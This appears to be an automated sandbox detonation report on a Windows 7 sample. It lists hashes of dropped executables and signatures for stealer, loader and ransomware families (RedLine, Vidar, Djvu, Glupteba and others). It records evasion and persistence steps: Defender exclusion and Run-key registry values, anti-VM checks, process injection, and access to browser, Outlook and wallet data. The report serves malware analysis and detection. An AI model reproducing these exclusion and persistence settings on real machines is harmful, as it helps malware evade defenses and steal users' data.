SHA256 f1d980607c0be60b816ea70efaf0439323463f29ab6b56c4055a171461e31288
SHA512 3d8d8dd9c485e19a4009fb62af94c250d28eaa56f15a3adc189bf9299308ff16c2bff397074b219f9075093df75349062ad860f65957a1c336b0421ff5157b0a

C:\Users\Admin\AppData\Local\Temp\92.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

C:\Users\Admin\AppData\Local\Temp\2310.exe

MD5 f0118fdfcadf8262c58b3638c0edc6a9
SHA1 a10b96bfc56711c9d605a0b61cca01b4ba6b6658
SHA256 8e380777da39ad7a588f4d9b703adc18b4ba935c21b17f215a3da5792672f205
SHA512 99ac5c4de20e47e8c355e9852061cb1ef25a44a5ef20cc0dd6187d13676a1cd7dd8a44cffa9462715bff3c7c7268814afe9fffb9b664f3e2cef3595a6b148837

C:\Users\Admin\AppData\Local\Temp\2310.exe

MD5 f0118fdfcadf8262c58b3638c0edc6a9
SHA1 a10b96bfc56711c9d605a0b61cca01b4ba6b6658
SHA256 8e380777da39ad7a588f4d9b703adc18b4ba935c21b17f215a3da5792672f205
SHA512 99ac5c4de20e47e8c355e9852061cb1ef25a44a5ef20cc0dd6187d13676a1cd7dd8a44cffa9462715bff3c7c7268814afe9fffb9b664f3e2cef3595a6b148837

memory/4384-56-0x0000000000EC0000-0x0000000000EC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FCD8.exe

MD5 23aca9b594e0ec61e744a486c34ed0ef
SHA1 44d7b53c310732634fbf48c2f313505cdb62c6a8
SHA256 59f7cff19dc1dbd16f7cf67fec46beab356e111b64c0d968d5bcd35dee1f6f61
SHA512 dbd56536231acfe82af1ae7fabf1f25419c9f62c8e5191d6f48d5c3a1c22161fc05aa1bbc2bc0c9b9d58574109a8f7db4d6a927915d9d8cdcc7f0f3b3c58ba33

memory/4384-52-0x0000000010000000-0x0000000010251000-memory.dmp

memory/4268-61-0x0000000000750000-0x0000000000850000-memory.dmp

memory/4268-62-0x0000000000600000-0x000000000060B000-memory.dmp

memory/4268-63-0x0000000000400000-0x00000000005B5000-memory.dmp

memory/3312-64-0x0000000004C00000-0x0000000005005000-memory.dmp

memory/3312-65-0x0000000005010000-0x00000000058FB000-memory.dmp

memory/3184-66-0x0000000003510000-0x0000000003526000-memory.dmp

memory/4268-69-0x0000000000400000-0x00000000005B5000-memory.dmp

memory/640-71-0x00007FF7A5510000-0x00007FF7A5E61000-memory.dmp

memory/4480-72-0x0000000000400000-0x000000000043E000-memory.dmp

memory/2012-75-0x0000000000F30000-0x0000000000F9B000-memory.dmp

memory/708-79-0x0000000001210000-0x000000000121C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

memory/4480-78-0x0000000007AC0000-0x0000000008064000-memory.dmp

memory/4480-82-0x00000000075B0000-0x0000000007642000-memory.dmp

memory/708-85-0x0000000001210000-0x000000000121C000-memory.dmp

memory/3312-84-0x0000000000400000-0x0000000002FB8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

memory/4384-87-0x0000000002BC0000-0x0000000002CDB000-memory.dmp

memory/4384-88-0x0000000002CE0000-0x0000000002DE1000-memory.dmp

memory/4384-89-0x0000000002CE0000-0x0000000002DE1000-memory.dmp

memory/4384-91-0x0000000002CE0000-0x0000000002DE1000-memory.dmp

memory/4384-92-0x0000000002CE0000-0x0000000002DE1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

C:\Users\Admin\AppData\Roaming\sewtuvw

MD5 a9991493e536d974f42a70843dae6209
SHA1 9f209dc03fbca602985e9f599732ebfc4b2a0cc3
SHA256 f1d980607c0be60b816ea70efaf0439323463f29ab6b56c4055a171461e31288
SHA512 3d8d8dd9c485e19a4009fb62af94c250d28eaa56f15a3adc189bf9299308ff16c2bff397074b219f9075093df75349062ad860f65957a1c336b0421ff5157b0a

memory/4480-104-0x00000000738D0000-0x0000000074080000-memory.dmp

memory/640-105-0x00007FF7A5510000-0x00007FF7A5E61000-memory.dmp

memory/4480-109-0x0000000007550000-0x000000000755A000-memory.dmp

memory/3312-107-0x0000000000400000-0x0000000002FB8000-memory.dmp

memory/2012-131-0x0000000001200000-0x0000000001280000-memory.dmp

memory/640-132-0x00007FF7A5510000-0x00007FF7A5E61000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-15 14:19

Reported

2023-10-15 14:24

Platform

win7-20230831-en

Max time kernel

151s

Max time network

160s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1004 created 1228 N/A C:\Users\Admin\AppData\Local\Temp\1000116001\latestX.exe C:\Windows\Explorer.EXE
PID 1004 created 1228 N/A C:\Users\Admin\AppData\Local\Temp\1000116001\latestX.exe C:\Windows\Explorer.EXE
PID 1004 created 1228 N/A C:\Users\Admin\AppData\Local\Temp\1000116001\latestX.exe C:\Windows\Explorer.EXE
PID 1004 created 1228 N/A C:\Users\Admin\AppData\Local\Temp\1000116001\latestX.exe C:\Windows\Explorer.EXE
PID 1004 created 1228 N/A C:\Users\Admin\AppData\Local\Temp\1000116001\latestX.exe C:\Windows\Explorer.EXE
PID 2980 created 1228 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Explorer.EXE
PID 2980 created 1228 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Explorer.EXE
PID 2980 created 1228 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Explorer.EXE
PID 2980 created 1228 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Explorer.EXE
PID 2980 created 1228 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Explorer.EXE
PID 2980 created 1228 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Explorer.EXE
PID 2616 created 1228 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 2616 created 1228 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 2616 created 1228 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 2616 created 1228 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 2616 created 1228 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 2616 created 1228 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE

Vidar

stealer vidar

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\d21cbe21e38b385a41a68c5e6dd32f4c.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\mi.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\1000116001\latestX.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\mi.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\mi.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\mi.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E2B2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4D4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000114001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000114001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000116001\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4261.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mi.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4D4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000114001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\system32\taskeng.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\d21cbe21e38b385a41a68c5e6dd32f4c.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A

Accesses 2FA software files, possible credential harvesting

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\47d27377-79df-432b-8551-6c7c0f0cd77c\\D2D9.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\D2D9.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\mi.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A

Manipulates WinMon driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMon C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\mi.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2660 set thread context of 2756 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Users\Admin\AppData\Local\Temp\D2D9.exe
PID 896 set thread context of 2852 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Users\Admin\AppData\Local\Temp\D2D9.exe
PID 760 set thread context of 1684 N/A C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe
PID 1800 set thread context of 3032 N/A C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build3.exe C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build3.exe
PID 2888 set thread context of 1952 N/A C:\Users\Admin\AppData\Local\Temp\E2B2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 2136 set thread context of 580 N/A C:\Users\Admin\AppData\Local\Temp\1000114001\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\1000114001\toolspub2.exe
PID 2032 set thread context of 1732 N/A C:\Users\Admin\AppData\Local\Temp\4261.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1884 set thread context of 2224 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
PID 1640 set thread context of 760 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
PID 2616 set thread context of 1592 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 2616 set thread context of 1956 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\explorer.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\1000116001\latestX.exe N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\mi.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Logs\CBS\CbsPersist_20231015142332.cab C:\Windows\system32\makecab.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\4261.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\NEAS.2b78d384474b9b3193d37612866def097e37491bfd991e0687b943ca135b18f7exe_JC.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\NEAS.2b78d384474b9b3193d37612866def097e37491bfd991e0687b943ca135b18f7exe_JC.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\NEAS.2b78d384474b9b3193d37612866def097e37491bfd991e0687b943ca135b18f7exe_JC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000114001\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000114001\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000114001\toolspub2.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." C:\Windows\system32\netsh.exe N/A
